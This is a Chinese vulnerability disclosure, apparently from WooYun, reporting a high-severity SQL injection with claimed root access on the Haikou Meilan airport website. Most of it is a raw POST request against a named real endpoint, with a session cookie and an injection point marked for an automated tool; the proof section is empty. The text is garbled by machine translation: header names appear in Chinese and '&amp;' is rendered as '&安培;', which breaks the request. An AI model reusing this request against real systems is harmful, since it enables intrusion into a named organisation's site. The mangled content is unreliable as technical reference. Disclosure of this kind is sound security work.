漏洞标题 海南航空有一个网站SQL注入/root权限 相关制造商 海南海口美兰机场 漏洞作者 过路人 提交时间 2016-05-06 09: 09 公共时间 2016-06-20 10: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 Mysql注入 漏洞详细信息 Www.mlairport.com POST /autoweb/wjdc/wjdcManager.do HTTP/1.1 主机: www.mlairport.com 用户代理: Mozilla/5.0(Macintosh; Intel Mac OS X 10.10; rv: 45.0)Gecko/20100101 Firefox/45.0 接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8 Accept-Language: zh-CN,zh; q=0.8,en-US; q=0.5,en; Q=0.3 Accept-Encoding: gzip,deflate Cookie: JSESSIONID=DAAC0D318E4F44595A4C3D6DE2F103EC 连接:保持活动状态 内容类型: application/x-www-form-urlencoded 内容长度: 483 COL1=1 *&安培; col10=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col11=%B7%C7%B3%A3%C2%FA%D2%E2&安培; COL12=%B7%C7 %B3%A3%C2%FA%D2%E2&安培; col13=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col14=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col15=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col16=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col17=%B7%C7%B3%A3% C2%FA%D2%E2&安培; COL2=1&安培; COL3=1&安培; COL4=1&安培; COL5=%CA%C7&安培; COL6=%BB%FA%B3%A1%B0%CD%CA%BF&安培; COL7=%CA %C7&安培; col8=%B7%C7%B3%A3%C2%FA%D2%E2&安培; col9=%B7%C7%B3%A3%C2%FA%D2%E2&安培; IPADDRESS=124.114.77.180&安培;方法=saveWjAction& state=& times=2016-03-15%2003: 54: 26& webname=syfh 漏洞证明:
修理计划: 过滤参数 版权声明:请注明出处。居民A @乌云